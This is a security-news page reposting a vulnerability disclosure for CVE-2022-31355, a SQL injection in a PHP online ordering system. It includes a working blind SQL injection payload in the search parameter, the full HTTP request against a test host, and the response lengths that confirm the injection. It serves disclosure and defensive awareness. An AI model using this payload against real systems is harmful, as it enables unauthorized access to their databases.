Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-31355: bug_report/SQLi-2.md at main · k0xx11/bug_report

Online Ordering System v2.3.2 was discovered to contain a SQL injection vulnerability via /ordering/index.php?q=category&search=.

CVE
#sql#vulnerability#windows#php#auth#firefox

Permalink

Online Ordering System By janobe has SQL injection vulnerability

Author: Lingtao Wang

vendor: https://www.sourcecodester.com/php/12978/online-ordering-system-phpmysqli.html

Vulnerability file: /ordering/index.php?q=category&search=

Vulnerability location: /ordering/index.php?q=category&search= //search is Injection point

[+]Payload: /ordering/index.php?q=category&search=3%20and%20length(database())%20=12–+ //search is Injection point

Current database name: multistoredb,length is 12

GET /ordering/index.php?q=category&search=3%20and%20length(database())%20=12–+ HTTP/1.1 Host: 192.168.1.19 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99 Connection: close

When length (database ()) = 11, Content-Length: 18685

When length (database ()) = 12, Content-Length: 23327

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907